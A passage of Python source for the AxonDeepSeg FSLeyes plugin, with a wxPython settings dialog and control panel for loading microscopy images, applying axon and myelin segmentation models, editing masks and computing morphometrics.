ADScontrol :type ads_control: ADScontrol """ self.ads_control = ads_control # Declare the settings used self.overlap_value = 25 self.model_resolution = 0.01 # Unused self.use_custom_resolution = False # Unused self.custom_resolution = 0.07 # Unused self.zoom_factor = 1.0 self.axon_shape = "circle" def on_settings_button(self, event): """ This function creates the settings_frame (the settings menu). It is called when the 'settings' button has been pressed. """ self.settings_frame = wx.Frame(self.ads_control, title="Settings", size=(600, 300)) frame_sizer_h = wx.BoxSizer(wx.VERTICAL) # Add the overlap value to the settings menu sizer_overlap_value = wx.BoxSizer(wx.HORIZONTAL) overlap_value_tooltip = wx.ToolTip("Represents the number of pixels that overlap two patches of the image when " "applying the prediction model") sizer_overlap_value.Add(wx.StaticText(self.settings_frame, label="Overlap value (pixels): ")) self.overlap_value_spinCtrl = wx.SpinCtrl(self.settings_frame, min=0, max=100, initial=self.overlap_value) self.overlap_value_spinCtrl.Bind(wx.EVT_SPINCTRL, self.on_overlap_value_changed) self.overlap_value_spinCtrl.SetToolTip(overlap_value_tooltip) sizer_overlap_value.Add(self.overlap_value_spinCtrl, flag=wx.SHAPED, proportion=1) frame_sizer_h.Add(sizer_overlap_value) # Add the zoom factor to the settings menu sizer_zoom_factor = wx.BoxSizer(wx.HORIZONTAL) zoom_factor_tooltip = wx.ToolTip("When applying the model, the pixel size of the image will be " "multiplied by this number. The zoom factor does not affect the computation of morphometrics.") sizer_zoom_factor.Add(wx.StaticText(self.settings_frame, label="Zoom factor: ")) self.zoom_factor_spinCtrlDouble = wx.SpinCtrlDouble(self.settings_frame, initial=self.zoom_factor, inc=0.0001) self.zoom_factor_spinCtrlDouble.Bind(wx.EVT_SPINCTRLDOUBLE, self.on_zoom_factor_changed) self.zoom_factor_spinCtrlDouble.SetToolTip(zoom_factor_tooltip) sizer_zoom_factor.Add(self.zoom_factor_spinCtrlDouble, flag=wx.SHAPED, proportion=1) frame_sizer_h.Add(sizer_zoom_factor) # Add the axon shape selection axon_shape_choices = ["circle", "ellipse"] sizer_axon_shape = wx.BoxSizer(wx.HORIZONTAL) axon_shape_tooltip = wx.ToolTip('Select what is the shape of the axons that will be considered when computing ' 'the morphometrics. "circle" will use the equivalent diameter (diameter of a circle with the same area as the axon). ' '"ellipse" will use minor axis of a fitted ellipse as diameter.') sizer_axon_shape.Add(wx.StaticText(self.settings_frame, label="Axon shape: ")) self.axon_shape_combobox = wx.ComboBox( self.settings_frame, choices=axon_shape_choices, size=(100, 20), value=self.axon_shape ) self.axon_shape_combobox.Bind(wx.EVT_COMBOBOX, self.on_axon_shape_combobox_item_selected) self.axon_shape_combobox.SetToolTip(axon_shape_tooltip) sizer_axon_shape.Add(self.axon_shape_combobox, flag=wx.SHAPED, proportion=1) frame_sizer_h.Add(sizer_axon_shape) # Add the done button sizer_done_button = wx.BoxSizer(wx.HORIZONTAL) done_button = wx.Button(self.settings_frame, label="Done") done_button.Bind(wx.EVT_BUTTON, self.on_done_button) sizer_done_button.Add(done_button, flag=wx.SHAPED, proportion=1) frame_sizer_h.Add(sizer_done_button) self.settings_frame.SetSizer(frame_sizer_h) self.settings_frame.Show() def on_overlap_value_changed(self, event): self.overlap_value = self.overlap_value_spinCtrl.GetValue() def on_zoom_factor_changed(self, event): self.zoom_factor = self.zoom_factor_spinCtrlDouble.GetValue() def on_axon_shape_combobox_item_selected(self, event): self.axon_shape = self.axon_shape_combobox.GetStringSelection() def on_done_button(self, event): # TODO: make sure every setting is saved self.settings_frame.Close() class ADScontrol(ctrlpanel.ControlPanel): """ This class is the object corresponding to the AxonDeepSeg control panel. """ def __init__(self, ortho, *args, **kwargs): """ This function initializes the control panel. It generates the widgets and adds them to the panel. It also sets the initial position of the panel to the left. :param ortho: This is used to access the ortho ops in order to turn off the X and Y canvas as well as the cursor """ ctrlpanel.ControlPanel.__init__(self, ortho, *args, **kwargs) # Create the settings object self.settings = ADSsettings(self) # Add a sizer to the control panel # This sizer will contain the buttons sizer_h = wx.BoxSizer(wx.VERTICAL) # Add the logo to the control panel ADS_logo = self.get_logo() sizer_h.Add(ADS_logo, flag=wx.SHAPED, proportion=1) # Add the citation to the control panel citation_box = wx.TextCtrl( self, value=self.get_citation(), size=(100, 50), style=wx.TE_MULTILINE ) sizer_h.Add(citation_box, flag=wx.SHAPED, proportion=1) # Add a hyperlink to the documentation hyper = hl.HyperLinkCtrl( self, -1, label="Need help? Read the documentation", URL="https://axondeepseg.readthedocs.io/en/latest/" ) sizer_h.Add(hyper, flag=wx.SHAPED, proportion=1) # Define the color of button labels button_label_color = (0, 0, 0) # Add the image loading button load_png_button = wx.Button(self, label="Load PNG or TIF file") load_png_button.SetForegroundColour(button_label_color) load_png_button.Bind(wx.EVT_BUTTON, self.on_load_png_button) load_png_button.SetToolTip(wx.ToolTip("Loads a .png or .tif file into FSLeyes")) sizer_h.Add(load_png_button, flag=wx.SHAPED, proportion=1) # Add the mask loading button load_mask_button = wx.Button(self, label="Load existing mask") load_mask_button.SetForegroundColour(button_label_color) load_mask_button.Bind(wx.EVT_BUTTON, self.on_load_mask_button) load_mask_button.SetToolTip( wx.ToolTip( "Loads an existing axonmyelin mask into FSLeyes. " "The selected image should contain both the axon and myelin masks. " "The regions on the image should have an intensity of 0 for the background, " "127 for the myelin and 255 for the axons. " ) ) sizer_h.Add(load_mask_button, flag=wx.SHAPED, proportion=1) # Add the model choice combobox self.model_combobox = wx.ComboBox( self, choices=ads_utils.get_existing_models_list(), size=(100, 20), value="Select the modality", ) self.model_combobox.SetForegroundColour(button_label_color) self.model_combobox.SetToolTip( wx.ToolTip("Select the modality used to acquire the image") ) sizer_h.Add(self.model_combobox, flag=wx.SHAPED, proportion=1) # Add the button that applies the prediction model apply_model_button = wx.Button(self, label="Apply ADS prediction model") apply_model_button.SetForegroundColour(button_label_color) apply_model_button.Bind(wx.EVT_BUTTON, self.on_apply_model_button) apply_model_button.SetToolTip( wx.ToolTip("Applies the prediction model and displays the masks") ) sizer_h.Add(apply_model_button, flag=wx.SHAPED, proportion=1) # The Watershed button's purpose isn't clear. It is unavailable for now. # # Add the button that runs the watershed algorithm # run_watershed_button = wx.Button(self, label="Run Watershed") # run_watershed_button.Bind(wx.EVT_BUTTON, self.on_run_watershed_button) # run_watershed_button.SetToolTip( # wx.ToolTip( # "Uses a watershed algorithm to find the different axon+myelin" # "objects. This is used to see if where are connections" # " between two axon+myelin objects." # ) # ) # sizer_h.Add(run_watershed_button, flag=wx.SHAPED, proportion=1) # Add the fill axon tool fill_axons_button = wx.Button(self, label="Fill axons") fill_axons_button.SetForegroundColour(button_label_color) fill_axons_button.Bind(wx.EVT_BUTTON, self.on_fill_axons_button) fill_axons_button.SetToolTip( wx.ToolTip( "Automatically fills the axons inside myelin objects." " THE MYELIN OBJECTS NEED TO BE CLOSED AND SEPARATED FROM EACH " "OTHER (THEY MUST NOT TOUCH) FOR THIS TOOL TO WORK CORRECTLY." ) ) sizer_h.Add(fill_axons_button, flag=wx.SHAPED, proportion=1) # Add the save Segmentation button save_segmentation_button = wx.Button(self, label="Save segmentation") save_segmentation_button.SetForegroundColour(button_label_color) save_segmentation_button.Bind(wx.EVT_BUTTON, self.on_save_segmentation_button) save_segmentation_button.SetToolTip( wx.ToolTip("Saves the axon and myelin masks in the selected folder") ) sizer_h.Add(save_segmentation_button, flag=wx.SHAPED, proportion=1) # Add compute morphometrics button compute_morphometrics_button = wx.Button(self, label="Compute morphometrics") compute_morphometrics_button.SetForegroundColour(button_label_color) compute_morphometrics_button.Bind(wx.EVT_BUTTON, self.on_compute_morphometrics_button) compute_morphometrics_button.SetToolTip( wx.ToolTip( "Calculates and saves the morphometrics to an excel and csv file. " "Shows the indexes of the axons at the coordinates specified in the morphometrics file." ) ) sizer_h.Add(compute_morphometrics_button, flag=wx.SHAPED, proportion=1) # Add the settings button settings_button = wx.Button(self, label="Settings") settings_button.SetForegroundColour(button_label_color) settings_button.Bind(wx.EVT_BUTTON, self.settings.on_settings_button) sizer_h.Add(settings_button, flag=wx.SHAPED, proportion=1) # Set the sizer of the control panel self.SetSizer(sizer_h) # Initialize the variables that are used to track the active image self.png_image_name = [] self.image_dir_path = [] self.most_recent_watershed_mask_name = None # Toggle off the X and Y canvas oopts = ortho.sceneOpts oopts.showXCanvas = False oopts.showYCanvas = False # Toggle off the cursor oopts.showCursor = False # Toggle off the radiological orientation self.displayCtx.radioOrientation = False # Invert the Y display self.frame.viewPanels[0].frame.viewPanels[0].getZCanvas().opts.invertY = True # Create a temporary directory that will hold the NIfTI files self.ads_temp_dir_var = tempfile.TemporaryDirectory() #This variable needs to stay loaded to keep the temporary # directory from being destroyed self.ads_temp_dir = Path(self.ads_temp_dir_var.name) # Check the version self.verrify_version() def on_load_png_button(self, event): """ This function is called when the user presses on the Load Png button. It allows the user to select a PNG or TIF image, convert it into a NIfTI and load it into FSLeyes. """ # Ask the user which file he wants to convert with wx.FileDialog( self, "select Image file", style=wx.FD_OPEN | wx.FD_FILE_MUST_EXIST ) as file_dialog: if ( file_dialog.ShowModal() == wx.ID_CANCEL ): # The user cancelled the operation return in_file = Path(file_dialog.GetPath()) # Check if the image format is valid image_extension = in_file.suffix valid_extensions = [".png", ".tif", ".jpg", ".jpeg"] if image_extension not in valid_extensions: self.show_message("Invalid file extension") return # Store the directory path and image name for later use in the application of the prediction model self.image_dir_path.append(in_file.parents[0]) self.png_image_name.append(in_file.name) # Call the function that convert and loads the png or tif image self.load_png_image_from_path(in_file) def on_load_mask_button(self, event): """ This function is called when the user presses on the loadMask button. It allows the user to select an existing PNG mask, convert it into a NIfTI and load it into FSLeyes. The mask needs to contain an axon + myelin mask. The Axons should have an intensity > 200. The myelin should have an intensity between 100 and 200. The data should be in uint8. """ # Ask the user to select the mask image with wx.FileDialog( self, "select mask .png file", style=wx.FD_OPEN | wx.FD_FILE_MUST_EXIST ) as file_dialog: if ( file_dialog.ShowModal() == wx.ID_CANCEL ): # The user cancelled the operation return in_file = Path(file_dialog.GetPath()) # Check if the image format is valid image_extension = in_file.suffix valid_extensions = [".png", ".tif", ".jpg", ".jpeg"] if image_extension not in valid_extensions: self.show_message("Invalid file extension") return # Get the image data img_png2D = ads_utils.imread(in_file) image_name = in_file.stem # Extract the Axon mask axon_mask = img_png2D > 200 axon_mask = params.intensity['binary'] * np.array(axon_mask, dtype=np.uint8) # Extract the Myelin mask myelin_mask = (img_png2D > 100) & (img_png2D < 200) myelin_mask = params.intensity['binary'] * np.array(myelin_mask, dtype=np.uint8) # Load the masks into FSLeyes axon_outfile = self.ads_temp_dir / (image_name + "-axon.png") ads_utils.imwrite(axon_outfile, axon_mask) self.load_png_image_from_path(axon_outfile, is_mask=True, colormap="blue") myelin_outfile = self.ads_temp_dir / (image_name + "-myelin.png") ads_utils.imwrite(myelin_outfile, myelin_mask) self.load_png_image_from_path(myelin_outfile, is_mask=True, colormap="red") def on_apply_model_button(self, event): """ This function is called when the user presses on the ApplyModel button. It is used to apply the prediction model selected in the combobox. The segmentation masks are then loaded into FSLeyes """ # Declare the default resolution of the model resolution = 0.1 # Get the image name and directory image_overlay = self.get_visible_image_overlay() if self.get_visible_image_overlay() is None: return n_loaded_images = self.png_image_name.__len__() image_name = None image_directory = None for i in range(n_loaded_images): if image_overlay.name == (Path(self.png_image_name[i])).stem: image_name = self.png_image_name[i] image_directory = self.image_dir_path[i] if (image_name is None) or (image_directory is None): self.show_message( "Couldn't find the path to the loaded image. " "Please use the plugin's image loader to import the image you wish to segment. " ) return image_path = image_directory / image_name image_name_no_extension = Path(image_name).stem # Get the selected model selected_model = self.model_combobox.GetStringSelection() if selected_model == "": self.show_message("Please select a model") return # Get the path of the selected model if any(selected_model in models for models in ads_utils.get_existing_models_list()): dir_path = Path(AxonDeepSeg.__file__).parents[0] model_path = dir_path / "models" / selected_model else: self.show_message("Please select a model") return # If the TEM model is selected, modify the resolution if "TEM" in selected_model.upper(): resolution = 0.01 # Check if the pixel size txt file exist in the imageDirPath pixel_size_exists = (image_directory / "pixel_size_in_micrometer.txt").exists() # if it doesn't exist, ask the user to input the pixel size if pixel_size_exists is False: with wx.TextEntryDialog( self, "Enter the pixel size in micrometer", value="0.07" ) as text_entry: if text_entry.ShowModal() == wx.ID_CANCEL: return pixel_size_str = text_entry.GetValue() pixel_size_float = float(pixel_size_str) else: # read the pixel size resolution_file = open((image_directory / "pixel_size_in_micrometer.txt").__str__(), 'r') pixel_size_float = float(resolution_file.read()) # Load model configs and apply prediction model_configfile = model_path / "config_network.json" with open(model_configfile.__str__(), "r") as fd: config_network = json.loads(fd.read()) segment_image( image_path, model_path, self.settings.overlap_value, config_network, resolution, acquired_resolution=pixel_size_float * self.settings.zoom_factor, verbosity_level=3 ) # The axon_segmentation function creates the segmentation masks and stores them as PNG files in the same folder # as the original image file. # Load the axon and myelin masks into FSLeyes axon_mask_path = image_directory / (image_name_no_extension + str(axon_suffix)) myelin_mask_path = image_directory / (image_name_no_extension + str(myelin_suffix)) self.load_png_image_from_path(axon_mask_path, is_mask=True, colormap="blue") self.load_png_image_from_path(myelin_mask_path, is_mask=True, colormap="red") self.pixel_size_float = pixel_size_float return self def on_save_segmentation_button(self, event): """ This function saves the active myelin and axon masks as PNG images. Three (3) images are generated in a folder selected by the user : one with the axon mask, one with the myelin mask and one with both. """ # Find the visible myelin and axon masks axon_mask_overlay = self.get_corrected_axon_overlay() if axon_mask_overlay is None: axon_mask_overlay = self.get_visible_axon_overlay() myelin_mask_overlay = self.get_visible_myelin_overlay() if (axon_mask_overlay is None) or (myelin_mask_overlay is None): return # Ask the user where to save the segmentation with wx.DirDialog( self, "select the directory in which the segmentation will be save", defaultPath="", style=wx.DD_DEFAULT_STYLE | wx.DD_DIR_MUST_EXIST, ) as file_dialog: if file_dialog.ShowModal() == wx.ID_CANCEL: return save_dir = Path(file_dialog.GetPath()) # store the data of the masks in variables as numpy arrays. # Note: since PIL uses a different convention for the X and Y coordinates, some array manipulation has to be # done. # Note 2 : The image array loaded in FSLeyes is flipped. We need to flip it back myelin_array = np.array( myelin_mask_overlay[:, :, 0], copy=True, dtype=np.uint8 ) myelin_array = np.flipud(myelin_array) myelin_array = np.rot90(myelin_array, k=1, axes=(1, 0)) axon_array = np.array( axon_mask_overlay[:, :, 0], copy=True, dtype=np.uint8 ) axon_array = np.flipud(axon_array) axon_array = np.rot90(axon_array, k=1, axes=(1, 0)) # Make sure the masks have the same size if myelin_array.shape != axon_array.shape: self.show_message("invalid visible masks dimensions") return # Remove the intersection myelin_array, axon_array, intersection = postprocessing.remove_intersection( myelin_array, axon_array, priority=1, return_overlap=True) if intersection.sum() > 0: self.show_message( "There is an overlap between the axon mask and the myelin mask. The myelin will have priority.") # Scale the pixel values of the masks to 255 for image saving myelin_array = myelin_array * params.intensity['binary'] axon_array = axon_array * params.intensity['binary'] image_name = myelin_mask_overlay.name[:-len("_seg-myelin")] myelin_and_axon_array = (myelin_array // 2 + axon_array).astype(np.uint8) ads_utils.imwrite(filename=save_dir / (image_name + str(axonmyelin_suffix)), img=myelin_and_axon_array) ads_utils.imwrite(filename=save_dir / (image_name + str(myelin_suffix)), img=myelin_array) ads_utils.imwrite(filename=save_dir / (image_name + str(axon_suffix)), img=axon_array) def on_run_watershed_button(self, event): """ This function is called then the user presses on the runWatershed button. This creates a watershed mask that is used to locate where are the connections between the axon-myelin objects. The runWatershed button is currently commented, so this function is unused at the moment. """ # Find the visible myelin and axon masks axon_mask_overlay = self.get_visible_axon_overlay() myelin_mask_overlay = self.get_visible_myelin_overlay() if (axon_mask_overlay is None) or (myelin_mask_overlay is None): return # Extract the data from the overlays axon_array = axon_mask_overlay[:, :, 0] myelin_array = myelin_mask_overlay[:, :, 0] # Make sure the masks have the same size if myelin_array.shape != axon_array.shape: self.show_message("invalid visible masks dimensions") return # If a watershed mask already exists, remove it. for an_overlay in self.overlayList: if (self.most_recent_watershed_mask_name is not None) and ( an_overlay.name == self.most_recent_watershed_mask_name ): self.overlayList.remove(an_overlay) # Compute the watershed mask watershed_data = self.get_watershed_segmentation(axon_array, myelin_array) # Save the watershed mask as a png then load it as an overlay watershed_image_array = np.rot90(watershed_data, k=3, axes=(1, 0)) watershed_image = Image.fromarray(watershed_image_array) file_name = self.ads_temp_dir.name + "/watershed_mask.png" watershed_image.save(file_name) wantershed_mask_overlay = self.load_png_image_from_path( file_name, add_to_overlayList=False ) wantershed_mask_overlay[:, :, 0] = watershed_data self.overlayList.append(wantershed_mask_overlay) # Apply a "random" colour mapping to the watershed mask opts = self.displayCtx.getOpts(wantershed_mask_overlay) opts.cmap = "random" self.most_recent_watershed_mask_name = "watershed_mask" def on_fill_axons_button(self, event): """ This function is called when the fillAxon button is pressed by the user. It uses a flood fill algorithm to fill the inside of the myelin objects with the axon mask """ # Find the visible myelin and axon mask myelin_mask_overlay = self.get_visible_myelin_overlay() axon_mask_overlay = self.get_visible_axon_overlay() if myelin_mask_overlay is None: return if axon_mask_overlay is None: return # Extract the data from the overlays myelin_array = myelin_mask_overlay[:, :, 0] axon_array = axon_mask_overlay[:, :, 0] # Perform the floodfill operation axon_extracted_array = postprocessing.floodfill_axons(axon_array, myelin_array) axon_corr_array = np.flipud(axon_extracted_array) axon_corr_array = params.intensity['binary'] * np.rot90(axon_corr_array, k=1, axes=(1, 0)) file_name = self.ads_temp_dir / (myelin_mask_overlay.name[:-len("-myelin")] + "-axon-corr.png") ads_utils.imwrite(filename=file_name, img=axon_corr_array) self.load_png_image_from_path(file_name, is_mask=True, colormap="blue") def on_compute_morphometrics_button(self, event): """ Compute morphometrics and save them to an Excel file. """ # Get pixel size try: pixel_size = self.pixel_size_float except: with wx.TextEntryDialog( self, "Enter the pixel size in micrometer", value="0.07" ) as text_entry: if text_entry.ShowModal() == wx.ID_CANCEL: return pixel_size_str = text_entry.GetValue() pixel_size = float(pixel_size_str) # Find the visible myelin and axon masks axon_mask_overlay = self.get_corrected_axon_overlay() if axon_mask_overlay is None: axon_mask_overlay = self.get_visible_axon_overlay() myelin_mask_overlay = self.get_visible_myelin_overlay() if (axon_mask_overlay is None) or (myelin_mask_overlay is None): return # store the data of the masks in variables as numpy arrays. # Note: since PIL uses a different convention for the X and Y coordinates, some array manipulation has to be # done. # Note 2 : The image array loaded in FSLeyes is flipped. We need to flip it back myelin_array = np.array( myelin_mask_overlay[:, :, 0] * params.intensity['binary'], copy=True, dtype=np.uint8 ) myelin_array = np.flipud(myelin_array) myelin_array = np.rot90(myelin_array, k=1, axes=(1, 0)) axon_array = np.array( axon_mask_overlay[:, :, 0] * params.intensity['binary'], copy=True, dtype=np.uint8 ) axon_array = np.flipud(axon_array) axon_array = np.rot90(axon_array, k=1, axes=(1, 0)) # Make sure the masks have the same size if myelin_array.shape != axon_array.shape: self.show_message("invalid visible masks dimensions") return # Save the arrays as PNG files pred = (myelin_array // 2 + axon_array).astype(np.uint8) pred_axon = pred > 200 pred_myelin = np.logical_and(pred >= 50, pred <= 200) x = np.array([], dtype=[ ('x0', 'f4'), ('y0', 'f4'), ('gratio','f4'), ('axon_area','f4'), ('axon_perimeter','f4'), ('myelin_area','f4'), ('axon_diam','f4'), ('myelin_thickness','f4'), ('axonmyelin_area','f4'), ('axonmyelin_perimeter','f4'), ('solidity','f4'), ('eccentricity','f4'), ('orientation','f4') ] ) # Compute statistics stats_array, index_image_array = compute_morphs.get_axon_morphometrics(im_axon=pred_axon, im_myelin=pred_myelin, pixel_size=pixel_size, axon_shape=self.settings.axon_shape, return_index_image=True) for stats in stats_array: x = np.append(x, np.array( [( stats['x0'], stats['y0'], stats['gratio'], stats['axon_area'], stats['axon_perimeter'], stats['myelin_area'], stats['axon_diam'], stats['myelin_thickness'], stats['axonmyelin_area'], stats['axonmyelin_perimeter'], stats['solidity'], stats['eccentricity'], stats['orientation'] )], dtype=x.dtype) ) with wx.FileDialog(self, "Save morphometrics file", wildcard="Excel files (*.xlsx)|*.xlsx", defaultFile="axon_morphometrics.xlsx", style=wx.FD_SAVE | wx.FD_OVERWRITE_PROMPT) as fileDialog: if fileDialog.ShowModal() == wx.ID_CANCEL: return # the user changed their mind # save the current contents in the file pathname = fileDialog.GetPath() if not (pathname.lower().endswith((".xlsx", ".csv"))): # If the user didn't add the extension, add it here pathname = pathname + ".xlsx" try: # Export to excel pd.DataFrame(x).to_excel(pathname) except IOError: wx.LogError("Cannot save current data in file '%s'." % pathname) # Generate and load the index image original_image_name = (axon_mask_overlay.name).split("-axon")[0] original_image_name = original_image_name.split("_seg")[0] index_outfile = Path(pathname).parents[0] / (original_image_name + str(index_suffix)) ads_utils.imwrite(index_outfile, index_image_array) self.load_png_image_from_path(index_outfile, is_mask=False, colormap="yellow") # Generate the colored image with indexes axon_array, myelin_array = postprocessing.remove_intersection(axon_array//255, myelin_array//255) axonmyelin_image = axon_array * params.intensity["axon"] + myelin_array * params.intensity["myelin"] axonmyelin_outfile = self.ads_temp_dir / axonmyelin_suffix ads_utils.imwrite(axonmyelin_outfile, axonmyelin_image) postprocessing.generate_and_save_colored_image_with_index_numbers( filename= Path(pathname).parents[0] / (original_image_name + str(axonmyelin_index_suffix)), axonmyelin_image_path= axonmyelin_outfile, index_image_array=index_image_array ) return def get_watershed_segmentation(self, im_axon, im_myelin, return_centroids=False): """ Parts of this function were copied from the code found in this document : https://github.com/neuropoly/axondeepseg/blob/master/AxonDeepSeg/morphometrics/compute_morphometrics.py In the future, the referenced script should be modified in order to avoid repetition. :param im_axon: the binary mask corresponding to axons :type im_axon: ndarray :param im_myelin: the binary mask corresponding to the myelin :type im_myelin: ndarray :param return_centroids: (optional) if this is set to true, the function will also return the centroids of the axon objects as a list of tuples :type return_centroids: bool :return: the label corresponding to the axon+myelin objects :rtype: ndarray """ # Label each axon object im_axon_label = measure.label(im_axon) # Measure properties for each axon object axon_objects = measure.regionprops(im_axon_label) # Deal with myelin mask if im_myelin is not None: # sum axon and myelin masks im_axonmyelin = im_axon + im_myelin # Compute distance between each pixel and the background. Note: this distance is calculated from the im_axon, # note from the im_axonmyelin image, because we know that each axon object is already isolated, therefore the # distance metric will be more useful for the watershed algorithm below. distance = ndi.distance_transform_edt(im_axon) # local_maxi = feature.peak_local_max(distance, indices=False, footprint=np.ones((31, 31)), labels=axonmyelin) # Get axon centroid as int (not float) to be used as index ind_centroid = ( [int(props.centroid[0]) for props in axon_objects], [int(props.centroid[1]) for props in axon_objects], ) # Create an image with axon centroids, which value corresponds to the value of the axon object im_centroid = np.zeros_like(im_axon, dtype="uint16") for i in range(len(ind_centroid[0])): # Note: The value "i" corresponds to the label number of im_axon_label im_centroid[ind_centroid[0][i], ind_centroid[1][i]] = i + 1 # Watershed segmentation of axonmyelin using distance map im_axonmyelin_label = morphology.watershed( -distance, im_centroid, mask=im_axonmyelin ) if return_centroids is True: return im_axonmyelin_label, ind_centroid else: return im_axonmyelin_label def load_png_image_from_path( self, image_path, is_mask=False, add_to_overlayList=True, colormap="greyscale" ): """ This function converts a 2D image into a NIfTI image and loads it as an overlay. The parameter add_to_overlayList allows to display the overlay into FSLeyes. :param image_path: The location of the image, including the name and the .extension :type image_path: Path :param is_mask: (optional) Whether or not this is a segmentation mask. It will be treated as a normal image by default. :type is_mask: bool :param add_to_overlayList: (optional) Whether or not to add the image to the overlay list. If so, the image will be displayed in the application. This parameter is True by default. :type add_to_overlayList: bool :param colormap: (optional) the colormap of image that will be displayed. This parameter is set to greyscale by default. :type colormap: string :return: the FSLeyes overlay corresponding to the loaded image. :rtype: overlay """ # Open the 2D image img_png2D = ads_utils.imread(image_path) if is_mask is True: img_png2D = img_png2D // params.intensity['binary'] # Segmentation masks should be binary # Flip the image on the Y axis so that the morphometrics file shows the right coordinates img_png2D = np.flipud(img_png2D) # Convert image data into a NIfTI image # Note: PIL and NiBabel use different axis conventions, so some array manipulation has to be done. img_NIfTI = nib.Nifti1Image( np.rot90(img_png2D, k=1, axes=(1, 0)), np.eye(4) ) # Save the NIfTI image in a temporary directory img_name = image_path.stem out_file = self.ads_temp_dir.__str__() + "/" + img_name + ".nii.gz" nib.save(img_NIfTI, out_file) # Load the NIfTI image as an overlay img_overlay = ovLoad.loadOverlays(paths=[out_file], inmem=True, blocking=True)[ 0 ] # Display the overlay if add_to_overlayList is True: self.overlayList.append(img_overlay) opts = self.displayCtx.getOpts(img_overlay) opts.cmap = colormap return img_overlay def get_visible_overlays(self): """ This function returns a list containing evey overlays that are visible on FSLeyes. :return: The list of the visible overlays :rtype: list """ visible_overlay_list = [] for an_overlay in self.overlayList: an_overlay_display = self.displayCtx.getDisplay(an_overlay) if an_overlay_display.enabled is True: visible_overlay_list.append(an_overlay) return visible_overlay_list def get_visible_image_overlay(self): """ This function is used to find the active microscopy image. This image should be visible and should NOT have the following keywords in its name : axon, myelin, Myelin, watershed, Watershed. :return: The visible microscopy image :rtype: overlay """ visible_overlay_list = self.get_visible_overlays() image_overlay = None n_found_overlays = 0 if visible_overlay_list.__len__() is 0: self.show_message("No overlays are displayed") return None if visible_overlay_list.__len__() is 1: return visible_overlay_list[0] for an_overlay in visible_overlay_list: if ( ("watershed" not in an_overlay.name) and ("Watershed" not in an_overlay.name) and (not an_overlay.name.endswith("-myelin")) and (not an_overlay.name.endswith("-Myelin")) and (not an_overlay.name.endswith("-Axon")) and (not an_overlay.name.endswith("-axon")) ): n_found_overlays = n_found_overlays + 1 image_overlay = an_overlay if n_found_overlays > 1: self.show_message("More than one microscopy image has been found") return None if n_found_overlays is 0: self.show_message("No visible microscopy image has been found") return None return image_overlay def get_visible_axon_overlay(self): """ This method finds the currently visible axon overlay :return: The visible overlay that corresponds to the axon mask :rtype: overlay """ visible_overlay_list = self.get_visible_overlays() axon_overlay = None n_found_overlays = 0 if visible_overlay_list.__len__() is 0: self.show_message("No overlays are displayed") return None for an_overlay in visible_overlay_list: if (an_overlay.name.endswith("-axon")) or (an_overlay.name.endswith("-Axon")): n_found_overlays = n_found_overlays + 1 axon_overlay = an_overlay if n_found_overlays > 1: self.show_message("More than one axon mask has been found") return None if n_found_overlays is 0: self.show_message("No visible axon mask has been found") return None return axon_overlay def get_corrected_axon_overlay(self): """ This method finds a the visible corrected axon overlay if it exists :return: The visible corrected axon overlay :rtype overlay """ visible_overlay_list = self.get_visible_overlays() axon_overlay = None n_found_overlays = 0 if visible_overlay_list.__len__() is 0: self.show_message("No overlays are displayed") return None for an_overlay in visible_overlay_list: if (an_overlay.name.endswith("-axon-corr")) or (an_overlay.name.endswith("-Axon-corr")): n_found_overlays = n_found_overlays + 1 axon_overlay = an_overlay if n_found_overlays > 1: self.show_message("More than one corrected axon mask has been found") return None if n_found_overlays is 0: return None return axon_overlay def get_visible_myelin_overlay(self): """ This method finds the currently visible myelin overlay :return: The visible overlay that corresponds to the myelin mask :rtype: overlay """ visible_overlay_list = self.get_visible_overlays() myelin_overlay = None n_found_overlays = 0 if visible_overlay_list.__len__() is 0: self.show_message("No overlays are displayed") return None for an_overlay in visible_overlay_list: if (an_overlay.name.endswith("-myelin")) or (an_overlay.name.endswith("-Myelin")): n_found_overlays = n_found_overlays + 1 myelin_overlay = an_overlay if n_found_overlays > 1: self.show_message("More than one myelin mask has been found") return None if n_found_overlays is 0: self.show_message("No visible myelin mask has been found") return None return myelin_overlay def show_message(self, message, caption="Error"): """ This function is used to show a popup message on the FSLeyes interface. :param message: The message to be displayed. :type message: String :param caption: (Optional) The caption of the message box. :type caption: String """ with wx.MessageDialog( self, message, caption=caption, style=wx.OK | wx.CENTRE, pos=wx.DefaultPosition, ) as msg: msg.ShowModal() def verrify_version(self): """ This function checks if the plugin version is the same as the one in the AxonDeepSeg directory """ ads_path = Path(AxonDeepSeg.__file__).parents[0] plugin_path_parts = ads_path.parts[:-1] plugin_path = Path(*plugin_path_parts) plugin_file = plugin_path / "ads_plugin.py" # Check if the plugin file exists plugin_file_exists = plugin_file.exists() if plugin_file_exists is False: return # Check the version of the plugin with open(plugin_file.__str__()) as plugin_file_reader: plugin_file_lines = plugin_file_reader.readlines() plugin_file_lines = [x.strip() for x in plugin_file_lines] version_line = 'VERSION = "' + VERSION + '"' plugin_is_up_to_date = True version_found = False for lines in plugin_file_lines: if (lines.startswith("VERSION = ")): version_found = True if not (lines == version_line): plugin_is_up_to_date = False if (version_found is False) or (plugin_is_up_to_date is False): message = ( "A more recent version of the AxonDeepSeg plugin was found in your AxonDeepSeg installation folder. " "You will need to replace the current FSLeyes plugin which the new one. " "To proceed, go to: file -> load plugin -> ads_plugin.py. Then, restart FSLeyes." ) self.show_message(message, "Warning") return def get_citation(self): """ This function returns the AxonDeepSeg paper citation. :return: The AxonDeepSeg citation :rtype: string """ return ( "If you use this work in your research, please cite it as follows: \n" "<NAME>., <NAME>., <NAME>., <NAME>., <NAME>., & <NAME>. (2018). " "AxonDeepSeg: automatic axon and myelin segmentation from microscopy data using convolutional " "neural networks. Scientific Reports, 8(1), 3816. " "Link to paper: https://doi.org/10.1038/s41598-018-22181-4. \n" "Copyright (c) 2018 NeuroPoly (Polytechnique Montreal)" ) def get_logo(self): """ This function finds the AxonDeepSeg logo saved as a png image and returns it as a wx bitmap image. :return: The AxonDeepSeg logo :rtype: wx.StaticBitmap """ ads_path = Path(AxonDeepSeg.__file__).parents[0] logo_file = ads_path / "logo_ads-alpha_small.png" png = wx.Image(str(logo_file), wx.BITMAP_TYPE_ANY).ConvertToBitmap() png.SetSize((png.GetWidth(), png.GetHeight())) logo_image = wx.StaticBitmap( self, -1, png, wx.DefaultPosition, (png.GetWidth(), png.GetHeight()) ) return logo_image @staticmethod def supportedViews(): """ I am not sure what this method does. """ from fsleyes.views.orthopanel import OrthoPanel return [OrthoPanel] @staticmethod def defaultLayout(): """ This method makes the control panel appear on the left of the FSLeyes window. """ return {"location": wx.LEFT}
examples/python/beat.py
